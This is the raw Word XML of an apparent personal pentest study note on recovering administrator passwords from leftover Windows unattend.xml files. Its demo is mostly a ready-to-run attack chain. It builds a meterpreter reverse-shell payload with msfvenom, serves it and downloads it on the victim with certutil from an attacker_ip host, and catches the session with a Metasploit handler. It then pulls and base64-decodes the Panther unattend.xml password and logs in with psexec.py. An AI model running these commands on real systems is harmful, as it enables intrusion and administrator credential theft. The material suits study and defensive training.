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3B2BD" w14:textId="34B48B5D" w:rsidR="00853ABF" w:rsidRPr="00522003" w:rsidRDefault="00327BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00522003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Searching For Passwords In Windows Configuration Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00522003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C5106" w14:textId="77777777" w:rsidR="00327BA6" w:rsidRDefault="00327BA6"/>
    <w:p w14:paraId="30A4C025" w14:textId="6CA9764B" w:rsidR="00522003" w:rsidRDefault="00522003">
      <w:r>
        <w:t xml:space="preserve">As administrator your task is to install the window in multiple computers so for this you use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00522003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unattended windows setup utility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>which is used to automate the mass installation /deploying the window on systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212148F5" w14:textId="6CEDB2A8" w:rsidR="00522003" w:rsidRDefault="00E015A6">
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00522003">
        <w:t>Tool use the configuration file that contain the specific configuration and user account credential specifically the administrator account’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F150F" w14:textId="08D4FBFF" w:rsidR="00FA1129" w:rsidRDefault="00522003">
      <w:r>
        <w:t>If left in the target system after installation. They are dangerous</w:t>
      </w:r>
      <w:r w:rsidR="00F631A3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCCC00" w14:textId="0A37C96D" w:rsidR="00FA1129" w:rsidRPr="00FA1129" w:rsidRDefault="00FA1129">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA1129">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Manually </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">to each of these systems and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1129">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delete them from each system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC40A27" w14:textId="77777777" w:rsidR="002B0510" w:rsidRDefault="002B0510"/>
    <w:p w14:paraId="0D10CAC0" w14:textId="5A7FF664" w:rsidR="002B0510" w:rsidRDefault="002B0510">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B0510">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unattended windows setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD78A0" w14:textId="67EC2BD5" w:rsidR="002B0510" w:rsidRDefault="00C33743">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>it depends upon the version as well as configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9DAF1" w14:textId="72E6FA80" w:rsidR="00C33743" w:rsidRDefault="00C33743">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2224E2BC" wp14:editId="411887BE">
            <wp:extent cx="4895557" cy="948621"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445"/>
            <wp:docPr id="207692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92000" name="Picture 20769200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486" cy="95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EEC39" w14:textId="524B86B4" w:rsidR="00C33743" w:rsidRDefault="00C33743">
      <w:r>
        <w:t>Typically, the name of file is autounattend.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCB45D" w14:textId="75ED8A02" w:rsidR="00C33743" w:rsidRPr="00C33743" w:rsidRDefault="00C33743">
      <w:r>
        <w:t xml:space="preserve">Might be </w:t>
      </w:r>
      <w:r w:rsidRPr="00C33743">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>encoded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C33743">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6E7BFD" w14:textId="77777777" w:rsidR="002B0510" w:rsidRDefault="002B0510"/>
    <w:p w14:paraId="5CF1264B" w14:textId="675F9AFA" w:rsidR="00FA1129" w:rsidRPr="001A14CF" w:rsidRDefault="001A14CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A14CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFD5D51" w14:textId="44C0F6B7" w:rsidR="001A14CF" w:rsidRDefault="00CD30F4">
      <w:r>
        <w:t xml:space="preserve">You can also </w:t>
      </w:r>
      <w:r w:rsidR="00531112">
        <w:t>Manually look for the attend file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B29DB3" w14:textId="37CEAAB1" w:rsidR="00531112" w:rsidRDefault="00531112">
      <w:r>
        <w:t xml:space="preserve">Gain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session to the victim system and try to find the attend file .and then decode it with base64 and then authenticate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>throught</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE40B10" w14:textId="77777777" w:rsidR="00531112" w:rsidRDefault="00531112"/>
    <w:p w14:paraId="15F6CF3A" w14:textId="715FA0DB" w:rsidR="00531112" w:rsidRDefault="00531112">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT=1234 -f exe &gt;payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D37C93" w14:textId="77777777" w:rsidR="00531112" w:rsidRDefault="00531112"/>
    <w:p w14:paraId="7924FC2D" w14:textId="670211A3" w:rsidR="00531112" w:rsidRPr="00531112" w:rsidRDefault="00531112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Webserver, Now</w:t>
      </w:r>
      <w:r w:rsidRPr="00531112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> host that file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E72769" w14:textId="328801C6" w:rsidR="00531112" w:rsidRDefault="00531112">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B680DB1" w14:textId="77777777" w:rsidR="00531112" w:rsidRDefault="00531112"/>
    <w:p w14:paraId="1AF0597A" w14:textId="7F0189A4" w:rsidR="00531112" w:rsidRPr="00531112" w:rsidRDefault="00531112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00531112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Access </w:t>
      </w:r>
      <w:r w:rsidR="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">webserver </w:t>
      </w:r>
      <w:r w:rsidRPr="00531112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on the victim computer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7979471B" w14:textId="3DC0A465" w:rsidR="00531112" w:rsidRDefault="009B0C87">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="009F259F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://attacker_ip/payload.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE5D91F" w14:textId="77777777" w:rsidR="009B0C87" w:rsidRDefault="009B0C87"/>
    <w:p w14:paraId="29516DDF" w14:textId="4289059B" w:rsidR="009B0C87" w:rsidRPr="009B0C87" w:rsidRDefault="009B0C87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Then on attacker system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD1229" w14:textId="72E1A47E" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53208F89" w14:textId="1707D562" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C588DBB" w14:textId="3D573D88" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B5746" w14:textId="11D3DEF0" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t xml:space="preserve">Set payload </w:t>
      </w:r>
      <w:r>
        <w:t>windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EDFA0A7" w14:textId="17CCBDD4" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151CE8F" w14:textId="3E6C8E43" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Set LHOST attacker _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="736A9B94" w14:textId="1179B33C" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C554AE" w14:textId="77777777" w:rsidR="009B0C87" w:rsidRDefault="009B0C87"/>
    <w:p w14:paraId="75DD9FAD" w14:textId="2C127398" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t xml:space="preserve">And then click the file on the target system and you get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1F3A75" w14:textId="4C1CC594" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r w:rsidRPr="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter session:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2722AAA2" w14:textId="5798F913" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Search -f unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D78E95" w14:textId="2FEEF2A6" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Cd C:\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F3DCA" w14:textId="234044B0" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Cd windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24171929" w14:textId="3AEA113A" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Cd panther</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8BA2FD" w14:textId="77777777" w:rsidR="00CD30F4" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t xml:space="preserve">Dir </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651808B3" w14:textId="39C59902" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>download unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C0EBD" w14:textId="77777777" w:rsidR="009B0C87" w:rsidRDefault="009B0C87"/>
    <w:p w14:paraId="1299181F" w14:textId="7E073A51" w:rsidR="009B0C87" w:rsidRPr="009B0C87" w:rsidRDefault="009B0C87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open the new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0E8939" w14:textId="4007F2FA" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Go to the downloaded file location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB257B" w14:textId="7CFDC18D" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4EABD" w14:textId="07B6C630" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Cat unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E86A5F5" w14:textId="4EA774B7" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093564EE" wp14:editId="4B67D09A">
            <wp:extent cx="3410125" cy="793791"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4135792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79283" name="Picture 41357928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125" cy="793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31F88" w14:textId="0DA920F1" w:rsidR="009B0C87" w:rsidRDefault="009B0C87">
      <w:r>
        <w:t>Copy the value and then decode it with base64 as &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paintext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; is false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B3E5D" w14:textId="01059DE5" w:rsidR="00A312F6" w:rsidRPr="009B0C87" w:rsidRDefault="00A312F6">
      <w:r>
        <w:t xml:space="preserve">Save that value </w:t>
      </w:r>
      <w:r w:rsidR="007E1BB9">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>n the file and then.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D16A45" w14:textId="77777777" w:rsidR="00245885" w:rsidRDefault="00A312F6">
      <w:r>
        <w:t>Base64 -d  (name of file).txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748986D" w14:textId="274687B8" w:rsidR="009B0C87" w:rsidRDefault="00B410CA">
      <w:r>
        <w:t>And you get the password of the administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF7500" w14:textId="5801AD8F" w:rsidR="00B410CA" w:rsidRDefault="00245885">
      <w:r>
        <w:t>#if the administrator change the password after doing all configuration /windows installation in the system then this password will not work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABAC181" w14:textId="77777777" w:rsidR="00245885" w:rsidRDefault="00245885"/>
    <w:p w14:paraId="14615CE4" w14:textId="488E7D49" w:rsidR="00245885" w:rsidRDefault="00245885">
      <w:r>
        <w:t xml:space="preserve">Psexec.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Administrator@target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8E6051" w14:textId="43E66294" w:rsidR="00245885" w:rsidRDefault="00245885">
      <w:r>
        <w:t>Then provide the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001B383" w14:textId="422B55EC" w:rsidR="00245885" w:rsidRDefault="00245885">
      <w:r>
        <w:t xml:space="preserve">And get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3050D7BA" w14:textId="1EEFA34B" w:rsidR="009B0C87" w:rsidRDefault="00FA715A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07364400" w14:textId="77777777" w:rsidR="009B0C87" w:rsidRDefault="009B0C87"/>
    <w:p w14:paraId="4534DAFA" w14:textId="77777777" w:rsidR="009B0C87" w:rsidRDefault="009B0C87"/>
    <w:p w14:paraId="772E4E82" w14:textId="535B7EB9" w:rsidR="009B0C87" w:rsidRPr="008B29EA" w:rsidRDefault="009B0C87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B29EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D7634" w14:textId="522FB00F" w:rsidR="009B0C87" w:rsidRPr="009B0C87" w:rsidRDefault="009B0C87" w:rsidP="009B0C87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B0C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC0B5B" w14:textId="4C3D8BA9" w:rsidR="009B0C87" w:rsidRDefault="009B0C87" w:rsidP="009B0C87">
      <w:r>
        <w:t>Window utility for downloading the file from the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D70C6" w14:textId="517B79E2" w:rsidR="009B0C87" w:rsidRDefault="00D84030" w:rsidP="009B0C87">
      <w:r>
        <w:t xml:space="preserve">We can also use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to do login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6F404" w14:textId="77777777" w:rsidR="00D84030" w:rsidRPr="00522003" w:rsidRDefault="00D84030" w:rsidP="009B0C87"/>
    <w:p w14:paraId="7F96B1BC" w14:textId="77777777" w:rsidR="009B0C87" w:rsidRPr="00522003" w:rsidRDefault="009B0C87"/>
    <w:sectPr w:rsidR="009B0C87" w:rsidRPr="005220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CFD"/>
    <w:rsid w:val="001A14CF"/>
    <w:rsid w:val="001C5CFD"/>
    <w:rsid w:val="00245885"/>
    <w:rsid w:val="002B0510"/>
    <w:rsid w:val="00327BA6"/>
    <w:rsid w:val="00522003"/>
    <w:rsid w:val="00531112"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007E1BB9"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B29EA"/>
    <w:rsid w:val="008E0429"/>
    <w:rsid w:val="009B0C87"/>
    <w:rsid w:val="00A312F6"/>
    <w:rsid w:val="00B410CA"/>
    <w:rsid w:val="00C33743"/>
    <w:rsid w:val="00CD30F4"/>
    <w:rsid w:val="00D84030"/>
    <w:rsid w:val="00E015A6"/>
    <w:rsid w:val="00F631A3"/>
    <w:rsid w:val="00FA1129"/>
    <w:rsid w:val="00FA7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87606"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD539813-02EF-48AD-9D64-AACF244FA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C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C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C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C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C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C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C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C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C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C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C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C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C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C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C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C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CF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0C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0C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tmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker_ip/payload.exe" TargetMode="External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334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48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-02T05:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-02T06:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>